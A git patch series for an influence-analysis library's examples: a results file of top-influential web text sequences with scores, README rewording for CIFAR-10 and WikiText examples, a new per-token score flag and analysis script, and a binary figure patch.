Environment Programme (UNEP) and the Food and Agriculture Organization of the United Nations (FAO) conservatively estimate that some 640,000 tonnes of fishing gear are left in our oceans each year. In just one deep water fishery in the north-east Atlantic some 25,000 nets, totalling around 1,250 km in length, were recorded lost +================================================================================ +Rank = 91; Score = 663552.0 +<|begin_of_text|>HAKU + +Suvi Korhonen + +Suomalainen lautapeliaiheinen sivusto on poistettu Googlen hakutuloksista. Sivun perustajan mukaan hakukonejätti ilmoittaa, että sisältö ei ole tarpeeksi omaperäistä tai painavaa, että Lautapeliopas.fi pitäisi löytyä Googlen hakukoneella etsimällä. + +Miten vuonna 2009 perustettu sivusto on yhtäkkiä muuttunut roskasisällöksi? + +Lautapeliopas.fi:n perustaja Mikko Saari sai tammikuussa Googlelta ilmoituksen, että koko sivusto on köykäistä sisällöltään (thin content) ja että se poistetaan hakutuloksista. Saari ajatteli, että asia hoituu merkitsemällä Wordpress-julkaisualustan luomat arkistosivut niin, että hakukone ei indeksoi niitä. + +Mutta muutostenkaan kanssa Googlen kanta ei muuttunut. Vastaus pyyntöön päästä takaisin hakukoneen listaukseen sai maanantaina kieltävän vastauksen. + +”Oletin, että Lautapelioppaan uudelleenarviointipyyntö olisi mennyt heittämällä läpi ja että kyse olisi ollut jostain virheestä. Mutta ei, ei mennyt. Lautapeliopas on edelleen poissa Googlen indeksistä”, Saari harmittelee. + +Nyt hakemalla Googlessa sanalla ”lautapeliopas” löytyy ensimmäisenä Lautapeliopas.fi:n perustajan Saaren omat sivut, joissa kerrotaan oppaan perustamisesta sekä Lautapelioppaan Facebook-profiili. Saari on palkittu pelaajien parissa Kultaisella lohikäärmeellä ahkerasta työstään peliharrastuksen edistämiseksi ja sivuston ylläpitämis +================================================================================ +Rank = 92; Score = 659456.0 +<|begin_of_text|>The gustatory system creates the human sense of taste, allowing us to perceive different flavors from substances that we consume as food and drink. Gustation, along with olfaction (the sense of smell), is classified as chemoreception. Because it functions by reacting with molecular chemical compounds in a given substance. Specialized cells in the gustatory system that are located on the tongue are called taste buds, and they sense tastants (taste molecules). The taste buds send the information after coming in contact with food from the tastants to the brain, where a molecule is processed as a certain taste. There are five main tastes: bitter, salty, sweet, sour, and umami (savory). All the varieties of flavor we experience are a combination of some or all of these tastes. + +The sense of taste is transduced by taste buds. Which are clusters of 50-100 taste receptor cells located in the tongue, soft palate, epiglottis, pharynx, and esophagus. The tongue is the main sensory organ of the gustatory system. The tongue contains papillae, or specialized epithelial cells, which have taste buds on their surface. There are three types of papillae with taste buds in the human gustatory system: + +Loading... + +fungiform papillae, which are mushroom-shaped and located at the tip of the tongue; + +foliate papillae, which are ridges and grooves toward the back of the tongue; + +circumvallate papillae, which are circular-shaped and located in a row just in front of the end of the tongue. + +You can’t taste food unless it’s mixed with your saliva + +Each taste bud is flask-like in shape and formed by two types of cells: supporting cells and gustatory cells. Gustatory cells are short-lived and are continuously regenerating. They each contain a taste pore at the surface of the tongue which is the site of sensory transduction. Though there are small differences in sensation, all taste buds, no matter their location, can respond to all types of taste.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 93; Score = 659456.0 +<|begin_of_text|>2016. november 16. 23:16 + +Könyörgök neked, írd meg sebtiben – mi lesz? Hová megyünk? Meddig élünk? Mifelé törekedjünk? Mitől tartózkodjunk? Ó, kérlek, felelj! + +Karinthy Frigyes 1918-as írását Nyáry Krisztián közölte újra Facebook-oldalán. + +„Kedves tanár úr vagy szerkesztő úr, vagy nem tudom, hogy nevezzem, aki 2016. november 16-án a Múzeum hírlapi halljában böngészi ezeket a lapokat, hogy nagy történelmi regényéhez, mely a forradalomban játszik, egykorú adalékot szerezzen - hát, hogy vannak maguk odaát, a másik században? Ma különös kedvet érzek, hogy magával eldiskuráljak, hogy magának, aki nekem nem válaszolhat, levelet írjak az idők mélységéből. Én is kaptam ilyen leveleket a múltból, ó, igen, csiklandós borzongással lapozgattam én is az 1792-es Moniteur és Ami du Peuple sárga rongyait. Danton és Marat és Desmoulins Camille irkáltak nekem a múlt börtönéből, és gondoltam rá, és tudom jól, hogy valamikor én is patinás múlt, sárga történelem leszek korommal együtt, a nagy falak közt, melyeknek egy ablaka van csak, hátrafelé nyíló. + +Ó, és borzongva gondoltam rá, mi lett volna, ha a régi emberek egyszer közvetlenül szólítottak volna a nevemen, vagy pontos megjelöléssel üzentek volna nekem, arccal fordultak volna felém, és rám né +================================================================================ +Rank = 94; Score = 659456.0 +<|begin_of_text|>Random Japanese player at your locals? + +On a nerd pilgrimage to Akihabara and not sure what to say? + +Pretty girl at the tournament and you want to show off your Japanese but don't actually know how to rune speak? + +You're on the moon and the evil moon emperor who only speaks Japanese wants you to prove that the world is worth protecting... And the only way you can do so is through VANGUARD FIGHT!!!??? + +These situations are common in day to day life, and as such, it's important to learn some handy words to use when playing vanguard in Japanese. + +Don't worry. Weve got you covered. Welcome to basic Japanese for Vanguard Fight. + +As long as you know the basic rules and most cards, you don't actually need to communicate as much information to keep the game going. Card games are communication tool! + +We will start with greetings. + +[WELL MET] [YOROSHIKU ONEGAISHIMASU] [よろしくお願いします] + +It is customary to greet someone at the start of a game when you first sit down with them. + +Introducing yourself is also quite important in the foundations of relationship building. + +[My name is Sarah. I play DIMENSION ROBO. What is your name?] [Wagahai wa Sarah to moushimasu. Wagahai wa Dimensions Robo wo tsukatteimasu. Kimi no Na wa?]「我輩はサラと申します。我輩はDimension Roboを使っています。貴殿に問おう:君の名は?」 + +You may or may not know your decks name in Japanese so English is somewhat acceptable. + +Just insert your own name where Sarah was placed and you're all set! Wagahai can also be swapped in and out for any other word you use to call yourself. If you're at loss for what to use you can just use your own name and call yourself in third person! + +Other examples of how to call yourself are Boku(girls and boys) watashi (more feminine but gender neutral) atashi (very female) or ore (masculine). If you have another on to for it. + +If you get your pronounciation slightly wrong don't worry! You're a foreigner and therefore can get away with anything. + +[I use Megacolony. What clan do you use?] [Watashi wa Megacolony wo tsukatteimasu. Kimi wa nani Clan tsuki desuka?] 「私は +================================================================================ +Rank = 95; Score = 659456.0 +<|begin_of_text|>Do violent video games make people more aggressive? Politicians and pundits have been asking that question for years now, and although everyone thinks they know the answer, scientific studies have yet to come up with results that satisfy even the most basic probing. + +Last night, the gaming website Polygon reported on a study from the American Psychological Association that concluded there was a link between violent games and aggression. “The research demonstrates a consistent relation between violent video game use and increases in aggressive behavior, aggressive cognitions and aggressive affect, and decreases in prosocial behavior, empathy and sensitivity to aggression,” read the report. + +But a closer look at the APA’s study (pdf) leads to a number of questions—many of the same questions Kotaku asked in January of 2013, when we ran an extensive look at the current state of research on video game violence. + +Some context: the APA study, which was published yesterday, is not based on new research but instead is a review of studies conducted between 2005 and 2013. In addition to looking through several individual journals, researchers with the APA scrutinized four meta-analyses—reports that look at wide swaths of research and try to spot patterns—and ultimately concluded that there is indeed a pattern of test subjects growing more aggressive after they play violent video games. + +There are serious problems with the study, though—problems we’ve pointed out in the past. Let’s go over a few. + +Advertisement + +1) How do you even measure aggression? + +An outside observer might wonder—how can you tell whether someone is “more aggressive”? Is there really a way to measure an emotional state like aggression? Well, some of the tests used in violent video game studies include: + +A) The “short story” test, where a subject is given the beginning of a writing prompt (“A driver crashes into Bob’s car. Bob gets out of his car and approaches the driver.”) and told to fill in what happens next. + +Advertisement + +B) The “noise” test, where a subject is asked to press a button that delivers a terrible sound to another subject, then evaluated based on how much noise they deliver and how intense it is. + +C) The “hot sauce” test, where a subject is asked to dole out hot sauce to another subject and is evaluated based on how much sauce they give and how spicy it is. + +Other tests ask subjects to fill out questionnaires asking how aggressive they feel, and if all this has you raising an eyebrow, you’re not alone. “Aggression” is an ambiguous +================================================================================ +Rank = 96; Score = 655360.0 +<|begin_of_text|>Wootz steel is a crucible steel characterized by a pattern of bands. These bands are formed by sheets of microscopic carbides within a tempered martensite or pearlite matrix in higher carbon steel, or by ferrite and pearlite banding in lower carbon steels. It was a pioneering steel alloy developed in Southern India in the 6th century BC and exported globally. It was also known in the ancient world by many different names including Ukku, Hindvi Steel, Hinduwani Steel, Teling Steel and Seric Iron. + +History [ edit ] + +Wootz steel originated in South India, in Tamilakam present day Tamil Nadu and Kerala.[1][2] There are several ancient Tamil, Greek, Chinese and Roman literary references to high carbon Tamil steel. The crucible steel production process started in the 6th century BC, at production sites of Kodumanal in Tamil Nadu, Golconda in Telangana, Karnataka and Sri Lanka and exported globally; the Tamils of the Chera Dynasty producing what was termed the finest steel in the world, i.e. Seric Iron to the Romans, Egyptians, Chinese and Arabs by 500 BC.[3][4][5] The steel was exported as cakes of steely iron that came to be known as "Wootz".[6] Wootz steel in India had high amount of carbon in it. + +The Tamilakam method was to heat black magnetite ore in the presence of carbon in a sealed clay crucible inside a charcoal furnace to completely remove slag. An alternative was to smelt the ore first to give wrought iron, then heat and hammer it to remove slag. The carbon source was bamboo and leaves from plants such as Avārai.[6][7] The Chinese and locals in Sri Lanka adopted the production methods of creating wootz steel from the Chera Tamils by the 5th century BC.[8][9] In Sri Lanka, this early steel-making method employed a unique wind furnace, driven by the monsoon winds. Production sites from antiquity have emerged, in places such as Anuradhapura, Tissamaharama and Samanalawewa, as well as imported artifacts of ancient iron and steel from Kodumanal. A 200 BC Tamil trade guild in Tissamaharama, in the South East of Sri Lanka, brought with them some of the oldest iron and steel artifacts and production processes to the island from the classical period.[10][11][12][13] + + +================================================================================ +Rank = 97; Score = 651264.0 +<|begin_of_text|>Q: Most of Dion Waiters' minutes should go to Tyler Johnson. Dion is just not a player worth investing in. I'm sure he puts maximum effort. Some players have it and some just don't. -- Chris, Orlando. + +A: These certainly are interesting times with the Heat, with Dion standing somewhat as the focus of the Heat's perimeter offense, be that because of other players deferring or Dion's confidence. Understand, after playing alongside Dwyane Wade, players such as Josh Richardson and Tyler Johnson have a certain natural inclination to defer. So you wind up with Dion getting the shot totals he has in the past two games (albeit in the absence of Goran Dragic), and taking the most meaningful shots against the Spurs and Hawks. And that's the fine line that Erik Spoelstra has to walk at this still-preliminary stage of the season: Do you put the ball in the hands of your young players and live with the consequences? Or do you go with the player who, at that moment, has the most confidence and experience in such situations. The Waiters situation is similar to the Heat's situation last season with Joe Johnson. There was talk about both continuing on with the team when the salary-cap reality going forward spoke otherwise. The difference at the end of last season with Johnson is that the Heat were admittedly living in the moment. Now it already appears that future moments are the priority. + +Q: Haven't we seen all there is with Josh McRoberts over the years? He isn't a scorer. He is a flash-first player and hesitant to shoot even when wide open. His 3-point game is average and not enough to spread the floor. I guess I'm not seeing the upside or possibilities with Josh -- Paul, Fort Lauderdale. + +A: Which is why I believe these current minutes are important, to finally get a read on what you have, to possibly showcase what you have, or to at least then know how to best move forward. This is not a team or an offense that can afford to have bystanders when it comes to scoring. Erik Spoelstra has been very good about issuing green lights, even insisting on it with players, such as Luke Babbitt. The Heat need offense. They need Josh McRoberts' offense. They should consider it almost insubordination if there is not an effort in that area. + +Q: Hi, Ira. I see so many questions and comments about trading Goran Dragic right now. However, wouldn't it make +================================================================================ +Rank = 98; Score = 643072.0 +<|begin_of_text|>Portland General Store was founded by Lisa and Troy in 2007. + +PGS products are made in America with vegan and organic ingredients. They use only essential oils in an organic base of cane sugar alcohol. Scents were inspired by old-fashioned recipes with no additives or chemicals in them. + +They have a “Whiskey” shaving soap (though the scent is described as a cedarwood base) but I decided to try their “Racer” shaving cream. I get a mostly “medicinal” scent from the cream’s jar though (Lisa from Portland General describes it as “mostly vetiver, patchouli, sandalwood, and a few other EOs”). + +Portland General’s web page says it can be applied with a brush but my attempts at lathering with a brush have been utterly futile. Massaging it in with fingers works fine though. + +Performance is good: lubrication and cushion is entirely acceptable. But the combination of the scent and not being unable to use it with a shave brush make this a secondary product for me. I would use it if I was travelling or needed a quick, brushless shave. + +Ingredients: Aloe barbadensis (Organic Aloe) Juice, Cocos nucifera (Organic Coconut) Oil, Butyrospermun parkii (Organic Shea) Butter, Palm Christi (Castor) Oil, Emulsifying Wax, Organic Calendula officinalis Extract, Palm Stearic Acid, Vegetable Glycerin, Titanium Dioxide, Theobroma cacao (Cocoa) Butter, Boswella carteri (Frankincense) Distillate, Salix alba L. (Organic white willowbark) Extract, Saccharum officinarum (Organic Sugar Cane) Extract, Acer saccharinum (Organic Sugar Maple) Extract, Citrus auranium dulcis (Organic Orange) Extract, Pterrocarpus santalinum (Sandalwood) Extract, Olea europaea (Olive Leaf) Extract, Camellia sinensis (Green Tea) Extract, Essential Oils, Glycolic Acid, Malic Acid, Tartaric Acid, Tocopherol (Vitamin E), Olea europaea (Organic Olive) Oil, Simmondsia chinensis (Organic Jojoba) Oil, Citric Acid<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 99; Score = 643072.0 +<|begin_of_text|>Whether its a new drug, a new fertilizer or a new solar panel, chemists have been stuck using the same methods to make their inventions. Now, the Center for Selective C-H Functionalization, run by Emory University organic chemist Huw Davies, is breaking the mold. + +“It is an entirely different way of putting molecules together,” Davies said. “And that means it allows you ready access to compounds that have either never been made before, or that were impractical to be made by the conventional methods.” + +This international collaboration of scientists is redesigning how organic chemicals are made. Every organic chemical has a basic framework made up of carbon and hydrogen. When chemists make new drugs, for example, they build on those existing frameworks. + +But what if you could break open that framework? You could build new chemical structures into the framework, Davies said, opening up new possibilities for drugs and other organic chemicals. + +It will also make some chemicals cleaner and cheaper to make, said Daniel Morton, managing director of the Center for Selective C-H Functionalization. By changing how chemicals are made, scientists can eliminate toxic byproducts and waste. + +“I think in every field of science one of the biggest drives in the last 20 years has been how to do things in a cleaner, more effective and efficient fashion,” he said. “And that’s what this center is all about.” + +Miles O’Brien has more on this story for the National Science Foundation series “Science Nation.”* + +*For the record, the National Science Foundation is also an underwriter of the NewsHour.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> diff --git a/examples/openwebtext/inspect_scores.py b/examples/openwebtext/inspect_scores.py index 96da5a8..8f658ce 100644 --- a/examples/openwebtext/inspect_scores.py +++ b/examples/openwebtext/inspect_scores.py @@ -11,7 +11,7 @@ def main(): - scores = Analyzer.load_file("influence_results/scores_jul_11_2024/pairwise_scores.safetensors")[ + scores = Analyzer.load_file("influence_results/openwebtext/scores_raw/pairwise_scores.safetensors")[ "all_modules" ].float() @@ -19,7 +19,7 @@ def main(): eval_dataset = get_custom_dataset() tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME, use_fast=True, trust_remote_code=True) - eval_idx = 4 + eval_idx = 5 sorted_scores = torch.sort(scores[eval_idx], descending=True) top_indices = sorted_scores.indices @@ -29,9 +29,7 @@ def main(): plt.show() print("Query Sequence:") - print( - "Prompt: " + eval_dataset[eval_idx]["prompt"] + "; Completion: " + eval_dataset[eval_idx]["completion"] + "\n" - ) + print("Prompt:" + eval_dataset[eval_idx]["prompt"] + "; Completion:" + eval_dataset[eval_idx]["completion"] + "\n") print("Top Influential Sequences:") for i in range(100): From e0da3d2f35549f8c218a2edaf4b0bad94acfb3a1 Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Mon, 15 Jul 2024 10:42:27 -0400 Subject: [PATCH 08/12] Change cifar10 example --- examples/cifar/README.md | 11 ++++++----- examples/cifar/analyze.py | 2 ++ 2 files changed, 8 insertions(+), 5 deletions(-) diff --git a/examples/cifar/README.md b/examples/cifar/README.md index 5474295..c45ed30 100644 --- a/examples/cifar/README.md +++ b/examples/cifar/README.md @@ -1,6 +1,6 @@ # CIFAR-10 & ResNet-9 Example -This directory contains scripts for training ResNet-9 and computing influence scores on CIFAR-10 dataset. The pipeline is motivated from +This directory contains scripts for training ResNet-9 and computing influence scores on the CIFAR-10 dataset. The pipeline is motivated from the [TRAK repository](https://github.com/MadryLab/trak/blob/main/examples/cifar_quickstart.ipynb). To get started, please install the necessary packages by running the following command: ```bash @@ -9,7 +9,7 @@ pip install -r requirements.txt ## Training -To train ResNet-9 on the CIFAR-10 dataset, run the following command: +To train ResNet-9 on CIFAR-10, execute: ```bash python train.py --dataset_dir ./data \ @@ -35,7 +35,8 @@ python analyze.py --query_batch_size 1000 \ --factor_strategy ekfac ``` -In addition to `ekfac`, you can also use `identity`, `diagonal`, and `kfac` as the `factor_strategy`. On an A100 (80GB) GPU, it takes roughly 2 minutes to compute the pairwise scores (including computing the EKFAC factors): +In addition to `ekfac`, you can also use `identity`, `diagonal`, and `kfac` as the `factor_strategy`. +On an A100 (80GB) GPU, computation takes approximately 2 minutes, including EKFAC factor calculation: ``` ---------------------------------------------------------------------------------------------------------------------------------- @@ -57,7 +58,7 @@ In addition to `ekfac`, you can also use `identity`, `diagonal`, and `kfac` as t ---------------------------------------------------------------------------------------------------------------------------------- ``` -To use AMP when computing influence scores, run: +To use AMP for faster computation, add the `--use_half_precision` flag: ```bash python analyze.py --query_batch_size 1000 \ @@ -89,7 +90,7 @@ This reduces computation time to about 40 seconds on an A100 (80GB) GPU: ---------------------------------------------------------------------------------------------------------------------------------- ``` -You can run `half_precision_analysis.py` to verify that the scores computed with AMP have high correlations with those of the default configuration. +Run `half_precision_analysis.py` to verify that AMP-computed scores maintain high correlations with default configuration scores.

Half Precision diff --git a/examples/cifar/analyze.py b/examples/cifar/analyze.py index b0d7d84..69c4faf 100644 --- a/examples/cifar/analyze.py +++ b/examples/cifar/analyze.py @@ -163,6 +163,8 @@ def main(): scores_name = factor_args.strategy if args.use_half_precision: score_args = all_low_precision_score_arguments(dtype=torch.bfloat16) + score_args.precondition_dtype = torch.float32 + score_args.per_sample_gradient_dtype = torch.float32 scores_name += "_half" analyzer.compute_pairwise_scores( scores_name=scores_name, From 05f2b4dd570d99bd20eb72ebdfd0da43135ff4f4 Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Mon, 15 Jul 2024 13:14:10 -0400 Subject: [PATCH 09/12] Add per-token computation --- examples/wikitext/README.md | 13 ++++++++++++- examples/wikitext/analyze.py | 9 +++++++++ 2 files changed, 21 insertions(+), 1 deletion(-) diff --git a/examples/wikitext/README.md b/examples/wikitext/README.md index 9acccd0..cfb7503 100644 --- a/examples/wikitext/README.md +++ b/examples/wikitext/README.md @@ -105,7 +105,7 @@ The average correlation for 481 data points is `0.96`. Counterfactual

-## Evaluating Linear Datamodeling Score +## Evaluation with Linear Datamodeling Score The `evaluate_lds.py` script computes the [linear datamodeling score (LDS)](https://arxiv.org/abs/2303.14186). It measures the LDS obtained by retraining the network 500 times with different subsets of the dataset (5 repeats and 100 masks). We obtain `0.44` LDS @@ -132,4 +132,15 @@ Top Influential Example: = = Description = = Homarinus capensis is considerably smaller than the large northern lobsters of the Atlantic Ocean, Homarus gammarus ( the European lobster ) and Homarus americanus ( the American lobster ), at 8 – 10 centimetres ( 3 @.@ 1 – 3 @.@ 9 in ) total length, or 4 – 5 cm ( 1 @.@ 6 – 2 @.@ 0 in ) carapace length. Accounts of the colouration of H. capensis are very variable, from tawny, red or yellow to " a rather dark olive ", similar to Homarus gammarus. Homarinus and Homarus are considered to be the most plesiomorphic genera in the family Nephropidae. Nonetheless, the Cape lobster differs from Homarus in a number of characters. The rostrum of the Cape lobster is flattened, while that of Homarus is rounded in section +``` + +## Tokenwise Influence Computations + +```bash +python analyze.py --query_batch_size 32 \ + --train_batch_size 64 \ + --checkpoint_dir ./checkpoints \ + --factor_strategy ekfac \ + --compute_per_token_score \ + --use_half_precision ``` \ No newline at end of file diff --git a/examples/wikitext/analyze.py b/examples/wikitext/analyze.py index 8afbc30..a8f803a 100644 --- a/examples/wikitext/analyze.py +++ b/examples/wikitext/analyze.py @@ -65,6 +65,12 @@ def parse_args(): default=8, help="Batch size for computing query gradients.", ) + parser.add_argument( + "--compute_per_token_scores", + action="store_true", + default=False, + help="Boolean flag to compute per token scores.", + ) parser.add_argument( "--profile", action="store_true", @@ -193,6 +199,9 @@ def main(): scores_name += "_half" if args.use_compile: scores_name += "_compile" + if args.compute_per_token_scores: + score_args.compute_per_token_scores = True + scores_name += "_per_token" rank = args.query_gradient_rank if args.query_gradient_rank != -1 else None if rank is not None: score_args.query_gradient_low_rank = rank From 18f5a008a95129cba853d041445c76a147e4f069 Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Mon, 15 Jul 2024 16:28:09 -0400 Subject: [PATCH 10/12] Add tokenwise computation example --- examples/cifar/README.md | 10 ++-- examples/cifar/analyze.py | 2 - examples/cifar/figure/half_precision.png | Bin 34249 -> 35439 bytes examples/cifar/half_precision_analysis.py | 6 ++- examples/requirements.txt | 3 +- examples/wikitext/README.md | 6 ++- examples/wikitext/requirements.txt | 3 +- examples/wikitext/tokenwise_analysis.py | 54 ++++++++++++++++++++++ 8 files changed, 72 insertions(+), 12 deletions(-) create mode 100644 examples/wikitext/tokenwise_analysis.py diff --git a/examples/cifar/README.md b/examples/cifar/README.md index c45ed30..b21bcd5 100644 --- a/examples/cifar/README.md +++ b/examples/cifar/README.md @@ -98,12 +98,12 @@ Run `half_precision_analysis.py` to verify that AMP-computed scores maintain hig ## Visualizing Influential Training Images -[This Colab notebook](https://colab.research.google.com/drive/1KIwIbeJh_om4tRwceuZ005fVKDsiXKgr?usp=sharing) provides a tutorial on visualizing the top influential training images. +For a tutorial on visualizing top influential training images, refer to [this Colab notebook](https://colab.research.google.com/drive/1KIwIbeJh_om4tRwceuZ005fVKDsiXKgr?usp=sharing) ## Mislabeled Data Detection We can use self-influence scores (see **Section 5.4** for the [paper](https://arxiv.org/pdf/1703.04730.pdf)) to detect mislabeled examples. -First, train the model with 10% of the training examples mislabeled by running: +First, train the model with 10% of the training examples mislabeled: ```bash python train.py --dataset_dir ./data \ @@ -117,7 +117,7 @@ python train.py --dataset_dir ./data \ --seed 1004 ``` -Then, compute the self-influence scores with: +Then compute self-influence scores: ```bash python detect_mislabeled_dataset.py --dataset_dir ./data \ @@ -126,7 +126,7 @@ python detect_mislabeled_dataset.py --dataset_dir ./data \ --factor_strategy ekfac ``` -On an A100 (80GB) GPU, it takes roughly 2 minutes to compute the self-influence scores: +On an A100 (80GB) GPU, this takes approximately 2 minutes: ``` ---------------------------------------------------------------------------------------------------------------------------------- @@ -148,7 +148,7 @@ On an A100 (80GB) GPU, it takes roughly 2 minutes to compute the self-influence ---------------------------------------------------------------------------------------------------------------------------------- ``` -Around 80% of mislabeled data points can be detected by inspecting 10% of the dataset (97% by inspecting 20%). +By inspecting just 10% of the dataset, about 80% of mislabeled data points can be detected (97% by inspecting 20%).

Mislabeled Data Detection diff --git a/examples/cifar/analyze.py b/examples/cifar/analyze.py index 69c4faf..b0d7d84 100644 --- a/examples/cifar/analyze.py +++ b/examples/cifar/analyze.py @@ -163,8 +163,6 @@ def main(): scores_name = factor_args.strategy if args.use_half_precision: score_args = all_low_precision_score_arguments(dtype=torch.bfloat16) - score_args.precondition_dtype = torch.float32 - score_args.per_sample_gradient_dtype = torch.float32 scores_name += "_half" analyzer.compute_pairwise_scores( scores_name=scores_name, diff --git a/examples/cifar/figure/half_precision.png b/examples/cifar/figure/half_precision.png index fc0ac2bbb03c39438fe0a2fdda080b042f97945e..da5d348537448f64c81b84958047d893e8324ab9 100644 GIT binary patch literal 35439 zcmeEucRbba`+uR3Ra9iYWmO7M_KHe&3)!QL?7c@xgpefLp|V%mjunz*oRgVNIK$?c z$NJqz>RmZ~zrTNe-^cg&czpUJ9`$waGQ3cRi&M{$V$(7t{9DCDnQzPWE7 z;ro622;d|H;9ua!LPz)Qd$3Rb@}=9ZdQ+8T&vfLxO2q`k%3rUnpUdIU&Ob+L$f{V} zU85&*%_5G@lHGFtt#S4NE9$;6PX9admSK}M~~KJ zk&qrse~&{kNKn@tNYre5?;S{KztD>Z*LdCcwH>&k#I0^Ua~9P>Oi+A z(10E7+h@xeCAsstTXk3a|qr$A5lbjAZ}x z!Tr;O1fqwZB@JJCW^f7jmJAWI-vj4I50>}uXCk?FeeR!YZ+G4To0O3*za%X-9|768 zH~u-YOvf67Xh9tXiG!Q%iLXjqdx2=G2vTvFL`6jMI9#IxBZk#sRC;)Mc-!?_9lCYAY1idZwq zL$FO_cHHX8PXWVTXM))JZC+IwBH)k3|4xKvJp8_;n?@H z6<&IJdhAD`sv|6RRH(DDU(m0;zf>RFl^YW3pM>IjTt`6w6-|wdI;)v4RC7#2$B?o$ zMnJCGb7Q`tJuia-KMysyx}V%iQ%TXk#ekpr&W}$sO6>cUDX63XG#cI5*!b?5{1@IE z2om&wnR>h9gUoIc<|^ruPrEU6i_+_;CpmO zP%|whgz@n3LuKpKTADJh9Bb=;bdshq9}$0z0J`=qIfD>DOG^*UN5PCZ2~x#F(X zYr=&yMiOR;7m=t&iK!aA*8{vL7sh-sGM=|Z+X6wwnHNGeelAW?b? zACgsakIXl)bjL9CxQ8-mA?;C~W)Nl_#61^3yt~sSO}(znLX}f49M?L3*UZY8CjhN+ zzf-p0^pqr5IU8OY%qsASSkyX#vzU~Nct@MIh#-{i56Y6A?(c}73cZehSB8MP>=~y! 